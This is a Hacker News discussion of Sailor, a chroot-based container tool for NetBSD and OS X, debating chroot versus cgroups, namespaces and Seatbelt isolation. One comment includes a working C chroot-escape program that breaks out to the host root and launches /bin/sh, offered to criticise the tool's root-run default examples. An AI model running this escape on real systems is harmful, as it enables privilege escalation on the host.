Sailor, a native and portable container system for NetBSD and Mac OS X (github.com/netbsdfr)
109 points by petepete on Jan 16, 2016 | 30 comments



While neat and useful, is it fair to call this a container? It seems to only partition/isolate the filesystem (perhaps the network interface too), while (arguably) the benefit of containers is being able to also partition and isolate CPU, memory, network, routing, etc.


Smarter people than me say that "true" containerization on OS X is not really a thing [1].

[1] https://github.com/vito/houdini


OS X doesn't provide kernel features directly equivalent to Linux's CLONE_* flags and cgroups. But it does provide Seatbelt, a sandboxing policy layer, which you could, with some effort, use to build something similar in end result. This is what both iOS apps and desktop App Store apps use for security isolation.

Alternatively, you could ship a kernel module that added these features (although that might be ridiculously complicated).
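
For a flavor of the Seatbelt route, here's a minimal sketch using the (long-deprecated but still illustrative) sandbox_init(3) API with one of Apple's built-in named profiles; the particular profile chosen here is just an example:

    /* Minimal Seatbelt sketch for OS X: deny network access to this process.
     * sandbox_init(3) is deprecated in favor of App Sandbox entitlements,
     * but it shows the policy-based isolation Seatbelt provides. */
    #include <sandbox.h>
    #include <stdio.h>
    #include <stdlib.h>

    int main(void) {
        char *err = NULL;

        /* Apply one of the built-in named profiles to the current process. */
        if (sandbox_init(kSBXProfileNoNetwork, SANDBOX_NAMED, &err) != 0) {
            fprintf(stderr, "sandbox_init failed: %s\n", err);
            sandbox_free_error(err);
            return EXIT_FAILURE;
        }

        /* From here on, network access is denied by policy. */
        printf("running under the no-network profile\n");
        return EXIT_SUCCESS;
    }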


Alex (aka vito) likes implementing things from scratch on weekends. So if you surprised him with a GitHub issue, he might just take you up on that challenge.


The CPU / memory / network "isolation" is done with cgroups and can be done without containers.
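
As a rough sketch of that (assuming a cgroup v1 layout with the memory controller mounted at /sys/fs/cgroup/memory, as was typical at the time), capping a plain process's memory is just directory creation and file writes, with no container runtime involved:

    /* Sketch: put the current process in a new memory cgroup with a 256 MB cap.
     * Assumes cgroup v1 with the memory controller at /sys/fs/cgroup/memory;
     * needs root. */
    #include <stdio.h>
    #include <sys/stat.h>
    #include <unistd.h>

    int main(void) {
        mkdir("/sys/fs/cgroup/memory/demo", 0755);          /* create the cgroup */

        FILE *f = fopen("/sys/fs/cgroup/memory/demo/memory.limit_in_bytes", "w");
        if (f) { fprintf(f, "268435456\n"); fclose(f); }    /* 256 MB cap */

        f = fopen("/sys/fs/cgroup/memory/demo/cgroup.procs", "w");
        if (f) { fprintf(f, "%ld\n", (long)getpid()); fclose(f); } /* join it */

        /* exec the real workload here; its memory is now limited */
        return 0;
    }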


cgroups are Linux-specific; they're not relevant for an OS X/NetBSD tool.


No kidding? (sarcasm)

They also don't isolate anything, especially when the container system is running as root. Neither does chroot.


This brings me back to when we were creating complex scripts to generate jails on FreeBSD.

It seems to me that Sailor is just a chroot; in other words, it's a jail with a bunch of stuff crammed in there to make it work, just like 10 years ago on FreeBSD when you created a jail and had to build out the system inside it yourself to make it work.


It should be pointed out that pkgin is not installed by default with NetBSD, although you can add it during the installer configuration. The reason I know that is that I manually configure my NetBSD installs, as I do not like to depend on configuration tools.


[flagged]


Please don't.

We detached this comment from https://news.ycombinator.com/item?id=10915862 and marked it off-topic.


Don't expect me to not LOL when idiots are downvoting technically true statements. ;)


So, the default example for node.js spawns the worker as root in the 'container'. Since this is a simple chroot, the worker could execute a '90s-style chroot escape (open; mkdir; chroot; fchdir; chdir ../../../; chroot) and gain root on the host.
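
For reference, that classic escape is only a few lines of C. This sketch assumes the process already has root inside the chroot, which is exactly what the default example hands it, and it only works on kernels that don't defend against the trick:

    /* The classic chroot escape, roughly as described above. */
    #include <fcntl.h>
    #include <sys/stat.h>
    #include <unistd.h>

    int main(void) {
        int fd = open(".", O_RDONLY);   /* handle to a dir outside the new root */
        mkdir("breakout", 0700);
        chroot("breakout");             /* move the root below our saved cwd */
        fchdir(fd);                     /* hop back out through the saved fd */
        for (int i = 0; i < 64; i++)    /* climb up to the host's real root */
            chdir("..");
        chroot(".");                    /* re-root at the host's / */
        return execl("/bin/sh", "sh", (char *)NULL);
    }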

Is this a joke?


If your goal with containerization is to run trusted applications that just need bizarre systemwide configuration (possibly mutually-conflicting configuration), and keep that configuration separate from the host, then no, it's not a joke. This is a super useful use case for containers.

There's a strong case to be made that you should not be trusting Docker containers to run untrusted code; they, too, are for configuration isolation, not security isolation. After all, Docker runs on top of the Linux kernel... If you want to run untrusted code, put it in a VM (KVM, bhyve, Xen, whatever).


I've never argued against the model of containerization for configuration isolation.

I'm arguing against this piece of software and the examples it ships. Giving root to a trusted web app is not sane.


Docker has kernel support from cgroups (and other features), which is vastly different from a simple chroot. Maybe it's not as strong as full virtualization, but if we're worried about kernel bugs that allow privilege escalation, we have to worry about everything running on the system, because it is all surface area for attacking kernel privilege escalation bugs.

Comparing Docker (or any Linux container using cgroups, like LXC) to chroot is not accurate.
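
To make the difference concrete, here's a minimal Linux-only sketch (run as root, error handling trimmed): with unshare(2), a process gets its own UTS and mount namespaces, so hostname changes and new mounts stay private to it, something chroot alone can't offer:

    /* Sketch: kernel namespaces provide isolation that chroot doesn't.
     * Linux-only; needs root (or CAP_SYS_ADMIN). */
    #define _GNU_SOURCE
    #include <sched.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

    int main(void) {
        /* Detach into fresh UTS and mount namespaces. */
        if (unshare(CLONE_NEWUTS | CLONE_NEWNS) != 0) {
            perror("unshare");
            return 1;
        }

        /* The hostname change is invisible to the rest of the system. */
        sethostname("sandboxed", strlen("sandboxed"));

        char buf[64];
        gethostname(buf, sizeof buf);
        printf("hostname inside the namespace: %s\n", buf);

        /* With CLONE_NEWNS, mounts made from here on stay private to this
         * process (subject to mount propagation settings). */
        return 0;
    }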


Sure, I agree that Docker is pretty good, and much better at security than a simple chroot. But I think you should be worried about those kernel bugs if you're on Linux, and you should therefore be using actual virtualization (hardware, paravirt, whatever). And therefore, it shouldn't matter how much better Docker is at security than a simple chroot, except as far as defense-in-depth goes: it should not be the single thing you're relying on to sandbox untrusted applications.

That is, I am not saying that Docker is bad at security; I am saying that caring about how much security it provides is using the wrong tool for the job.


> we have to worry about everything running on the system, because it is all surface area for attacking kernel privilege escalation bugs

Usually "everything running on tbe system" is trusted code. The threat would be a bug in your software that allows remote code execution and could potentially be combined with a kernel bug to achieve privilege escalation.

The game changes significantly when you're giving arbitrary user-supplied code immediate access to make kernel calls. Now you're only one bug away from game over. And you're trusting the security of your whole system with a mechanism that wasn't really designed for security against untrusted code in the first place.


On that, we're agreed. The Docker ecosystem is scary for that reason. But, "trusted code" is also wishful thinking in most deployments. So many deployments are slapped together out of a bunch of random places. The way many people use Docker just takes that to a slightly more terrifying new level of risk.

e.g.: npm, go get, *brew (in particular, Homebrew, OMG; goddamned thing installs everything, from webservers to databases, to run as the same user with little warning about what kind of consequences that has), etc.

People do stupid shit all the time with their software deployments, is what I'm trying to say.

I just didn't want people to think Docker (or other Linux containers) are comparable to chroot. They really aren't the same thing.


npm, go get, Homebrew... they're all right by me, in fact. I would rather take the risk and trust them than do so many things manually. They could introduce a safety risk, the same as when you buy a can of food from a superstore and eat it "as the same user with little warning about what kind of consequences that has".


I've made no suggestion of doing anything manually. That would likely be even more dangerous.

There are well-known and well-understood automated methods of providing a (mostly) trustworthy source for software installation: RPM+yum on CentOS, deb+apt-get on Debian/Ubuntu. The packages can be signed and verified (so you know you're getting what the vendor packaged), and the OS-standard sources are open source, easy for third parties to check, and used on millions of machines (so manipulation is likely to be spotted quickly). It is easy to verify the versions you have with one command, easy to update to newer versions when security issues arise, and easy to verify that the files currently installed match (or don't) the ones the package shipped with. And it is relatively easy to package one's own tools and put them into a local repository, using the same methods to ensure safe delivery to all of your systems.

I understand using other methods of locally providing packages. And I understand that sometimes you have to go outside the vendor-provided packages (and can't build your own using the same best practices). But to imagine that you can/should trust a big blob of data grabbed from the internet and splooshed onto your system (sometimes as root!) using a pipe to /bin/sh is ridiculous. Don't do that in an automated fashion without explicitly checking what you're being delivered. And I would probably opt to host my own private repo of those things, so that I can re-verify any time there are changes before they get splooshed out to all of my systems.

This is basic operations stuff here, and yet folks keep reinventing the wheel, poorly, and aggressively marketing it as a superior wheel.


Well, it is designed on NetBSD, where this doesn't work.

E.g., see http://www.slideshare.net/phdays/chw00t-breaking-unices-chro... slide 27


Sailor's goal is definitely not to bring security; we all know perfectly well that chroot is not the way to isolate a host filesystem from attackers. Instead, sailor provides a convenient way of testing environments without compromising your workstation / dev station filesystem.


Which was, as it happens, the reason chroot was invented (to test the installer of newer versions of UNIX without having a brand-new physical system). Better tooling around chroot is absolutely useful.

I guess it's a misnomer to use the word "container", since that usually means things like Linux containers with security isolation almost as good as OS virtualization.


Right, the "container" word is now vastly associated to docker, yet I picked a word I know IT people will get and which is generic enough. I'll think on an alternative buzzword ;) Thanks for your support!


The word you're looking for is "chroot".


There is a difference between not bringing in additional security and bringing anti-security. In my eyes, you are doing the latter.

Your default examples elevate privilege without warning the user about this fact anywhere.


Duly noted; I just added a word about it on the GitHub page. And you're right, I should run the example services with a dedicated user, as I already do for the nginx process. Thanks for your feedback!


And so it is: I just committed changes so both PM2 and gunicorn are started with a dedicated user.


There is already a Lua web framework named Sailor: http://sailorproject.org/ -- since this is a rather closely related problem domain, it might be nice to avoid name collisions.


I fail to see how it's a closely related problem domain.



